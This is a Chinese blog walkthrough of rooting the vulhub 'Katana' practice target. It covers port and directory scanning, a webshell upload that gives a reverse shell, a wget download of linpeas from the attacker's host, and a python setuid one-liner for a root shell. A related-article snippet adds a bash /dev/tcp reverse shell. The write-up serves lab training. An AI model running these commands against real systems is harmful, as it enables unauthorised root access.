katana(武士刀)setuid提权

最新推荐文章于 2024-04-29 22:40:13 发布
最新推荐文章于 2024-04-29 22:40:13 发布
阅读量678 收藏
点赞数
分类专栏: vulhub系列 文章标签: linux 运维 服务器 web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127211327
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:y6jf

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.arp-scan -l

探测目标靶机

2.nmap -p- -A -T4 192.168.1.119

探测目标靶机开放的端口和服务,端口一大堆

漏洞探测

1.尝试登录ftp,没有利用的信息

2.登录smb服务,也不允许查看

3.访问80端口后还有 7080 8088 8715

4.网址变成了https类型的

5. gobuster dir -u http://192.168.1.119 \ -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

探测出/ebook目录

6.gobuster dir -u http://192.168.1.119:8088 \ -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

探测8088端口下的目录,发现有upload.html

7.7080,8715扫描不出来

漏洞利用

1.登录探测出的/ebook 发现是一个书店网站

2.成功登录网站后台

3.新建一本书,上传我们的木马

4.登录错误,回到首页

5.点击edit,进入后在上传木马

6.发现没有反应,抓包查看,这里的请求方式是get ,那么木马就传不上去,放弃这条路;

7.再访问8088端口扫出来的upload.html,上传木马回弹shell

8.发现这里将上传目录变更,/opt 目录是一个大型软件安装目录,表示怪异

9.尝试触发木马,尝试好多端口都不行,只有8715可以

权限提升

1.用python回弹一个交互式shell,发现家目录下一个.ssh_passwd

2.发现用户名和密码katana@katana12345

find / -perm -u=s -type f 2>/dev/null

没有可以利用的

3.这次决定上传脚本来检测linpeas.sh(github里有)

本地开启http服务把脚本上传到靶机,进行检测

wget http://192.168.1.106:8000/linpeas.sh

4.检测到setuid 这不就是大宝贝吗

5.getcap -r / 2>/dev/null

getcap -r / 2>/dev/null
getcap:查看可执行文件获取的内核权限
r:代表顶层目录
2>/dev/null:就是将标准错误stderr删掉

/usr/bin/python2.7 -c "import os;os.setuid(0);os.system('/bin/bash')"

这里直接用python来提权并且setuid(0)直接进入root,成功拿下!!!

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
linux提权基础
学生
11-04 939
Linux提权思路
linux 提权总结
weixin_51681694的博客
06-13 7195
会继续补充.....
[Python] 一篇文章弄懂迭代器、生成器和yield
Spade_的博客
03-29 2万+
一篇文章弄懂yield、生成器1. 迭代器和生成器1.1 range迭代器和生成器1.2 迭代器1.3 生成器2. 使用yield的生成器函数3. 生成器的next()、send()、throw()、close()4 为什么说send()相当于next(),我们看看底层代码!5. 参考博客 1. 迭代器和生成器 迭代器: 可以迭代的对象 生成器: 按一定的算法生成一个序列,比如自然数序列、斐波那...
linux提权】利用setuid进行简单提权
question55的博客
12-24 491
但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义,在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个。SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主。,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限。
Linux 提权
qq_63527808的博客
11-22 1012
1、ctrl + z 把 shell 进程放到后台。1.1 使用 nc 对进行监听。2、运行 python 脚本。2、执行 java 脚本。3、fg 再调用后台任务。
低多边形武士刀 low ploy Katana
03-23
低多边形武士刀 fbx 格式 一个独特的低多边形武士刀,供您在游戏或其他项目中使用。这种高质量的资产将使您能够创建一个很酷的游戏、动画或任何其他您心目中的创意项目。 特征 在blender中手工制作的low poly 武士刀...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
Samurai Katana AnimSet
05-15
它提供了多种武士动作,包括但不限于攻击、防御、行走、跑步、跳跃、转身、拔刀、挥砍、刺击、格挡、胜利姿势以及死亡动画等。这些动作旨在让游戏中的角色更加生动、自然,提升玩家的沉浸感。 动作集中的每个动画都...
Katana
10-25
"Katana"一词来源于日语,意为“剑”,这暗示了该字体设计可能带有某种锋利、简洁的线条特点,如同武士刀一般优雅而有力。 在字体设计中,Katana可能体现了日本传统艺术与现代设计的融合。它可能具有清晰的笔画,...
linux常见的提权办法
m0_62207482的博客
02-23 157
1.uid 提 权 (find / -perm -u=s -type f 2>/dev/null)2.(sudo git help config!/bin/bash或者!8、docker提权
setcap详解及常遇到的提权失败定位
02-13
setcap详解及常遇到的提权失败定位,内核能力问题:关于提权给非root用户失败的案例小结
Samurai:武士棋盘游戏端口到PC的CS2
04-28
武士 用于CS2的PC的武士棋盘游戏端口。
Linux suid提权详细总结
2301_76690905的博客
11-11 565
suid(set uid)是linux中的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。suid特点是用户运行某个程序时,如果该程序有suid权限,程序运行进程的属主不是发起者,而是程序文件所属的属主。linux引入了3个文件来管理用户组:/etc/passwd存放用户信息。/etc/shadow存放用户密码信息。/etc/group存放组信息。
Linux提权--SUID提权&内核漏洞本地用户提权
最新发布
金灰的博客
04-29 822
免责声明:本文仅做技术交流与学习,请不要乱搞破坏...
suid提权linux
weixin_68652890的博客
04-15 984
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
linux下suid提权笔记
热门推荐
Shanfenglan's blog
08-23 26万+
find find /bin/ -name ls -exec /bin/nc -lvp123 ; find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ; find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null less less /etc/passwd !/bin
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1949
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
linux系统利用可执行文件的Capabilities实现权限提升
whatday的专栏
10-25 2745
一、操作目的和应用场景 Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。 这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为
/** * Katana1994 Macro */ function Katana1994() { Dim doc1 As Document Dim rng As Range Dim chapterStart As Long Dim chapterEnd As Long Dim chapterTitle As String Dim chapterIndex As Integer Dim newDoc As Document Set doc1 = ActiveDocument chapterIndex = 1 ' 遍历文档的每个段落 For i = 1 To doc.Paragraphs.Count Set rng = doc.Paragraphs(i).Range ' 检查段落是否为章节标题 If rng.Text Like "第*篇*" Or rng.Text Like "*、*" Then If chapterStart > 0 Then chapterEnd = rng.Start - 1 ' 选中章节内容 doc.Range(chapterStart, chapterEnd).Select ' 复制章节内容 Selection.Copy ' 创建新文档并粘贴章节内容 Set newDoc = Documents.Add newDoc.Content.Paste ' 保存新文档 newDoc.SaveAs "Chapter" & chapterIndex & " - " & chapterTitle & ".docx" newDoc.Close chapterIndex = chapterIndex + 1 End If ' 更新章节标题和起始位置 chapterTitle = rng.Text chapterStart = rng.End End If Next i } 纠正代码
05-24
1. 定义的过程名为 Katana1994(),但是在代码中使用了 doc 变量,应该将其改为 doc1。 2. 在 For 循环中,应该使用 doc1.Paragraphs.Count 而不是 doc.Paragraphs.Count。 3. 在 If 语句中,应该使用 rng.Text ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值